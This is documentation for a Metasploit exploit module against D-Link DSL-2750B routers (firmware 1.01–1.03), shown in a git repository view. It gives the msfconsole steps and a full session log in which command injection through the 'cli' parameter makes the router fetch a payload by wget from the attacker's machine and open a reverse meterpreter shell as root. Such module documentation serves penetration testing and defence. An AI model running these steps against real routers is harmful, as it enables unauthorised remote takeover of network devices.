adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
e2e8568860e381fc09e1ecedd5ddfc6fdfa3ce99
metasploit-gs/documentation/modules/exploit/linux/http/dlink_dsl2750b_exec_noauth.md
T
lucyoa 6ae55aadd4 Fixing documentation, improving exploits code
2018-05-20 12:55:46 -04:00

3.0 KiB
Raw Blame History

Description

This module dlink_dsl2750b_exec_noauth exploits unauthenticated command injection vulnerability through "cli" parameter. Vulnerable firmwares are 1.01 up to 1.03.

Verification Steps

  1. Start msfconsole
  2. Do : use exploit/linux/http/dlink_dsl2750b_exec_noauth
  3. Do : set RHOST [RouterIP]
  4. Do : set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
  5. Do : run
  6. If router is vulnerable, payload should be dropped via wget method and executed giving us meterpreter session

Scenarios

msf5 > use exploit/linux/http/dlink_dsl2750b_exec_noauth 
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp 
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LHOST eth0
LHOST => eth0
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LPORT 5555
LPORT => 5555
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > run

msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > run

[*] Started reverse TCP handler on 192.168.1.6:5555 
[*] 192.168.1.1:80 Checking target version...
[*] Using URL: http://0.0.0.0:8080/1M6nI0Or6FUiW
[*] Local IP: http://192.168.1.6:8080/1M6nI0Or6FUiW
[*] Client 192.168.1.1 (Wget) requested /1M6nI0Or6FUiW
[*] Sending payload to 192.168.1.1 (Wget)
[*] Sending stage (1104216 bytes) to 192.168.1.1
[*] Meterpreter session 25 opened (192.168.1.6:5555 -> 192.168.1.1:48989) at 2018-05-14 05:30:49 -0400
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.

meterpreter > ls -la
Listing: /
==========

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40755/rwxr-xr-x   2554    dir   2013-03-11 07:27:09 -0400  bin
40755/rwxr-xr-x   3       dir   2013-03-11 07:27:54 -0400  data
40755/rwxr-xr-x   2482    dir   2013-03-11 07:27:56 -0400  dev
40755/rwxr-xr-x   779     dir   2013-03-11 07:27:55 -0400  etc
40755/rwxr-xr-x   690     dir   2013-03-11 07:27:55 -0400  lib
100755/rwxr-xr-x  287124  fil   2013-03-11 07:27:55 -0400  linuxrc
40755/rwxr-xr-x   0       dir   1969-12-31 19:00:01 -0500  mnt
40755/rwxr-xr-x   56      dir   2013-03-11 07:13:15 -0400  opt
40555/r-xr-xr-x   0       dir   1969-12-31 19:00:00 -0500  proc
40755/rwxr-xr-x   270     dir   2013-03-11 07:25:43 -0400  sbin
40755/rwxr-xr-x   0       dir   1969-12-31 19:00:00 -0500  sys
40755/rwxr-xr-x   0       dir   2016-10-08 07:54:13 -0400  tmp
40755/rwxr-xr-x   38      dir   2013-03-11 07:23:32 -0400  usr
40755/rwxr-xr-x   0       dir   2016-10-08 07:46:13 -0400  var
40755/rwxr-xr-x   2801    dir   2013-03-11 07:26:34 -0400  webs

meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.30)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
Reference in New Issue View Git Blame Copy Permalink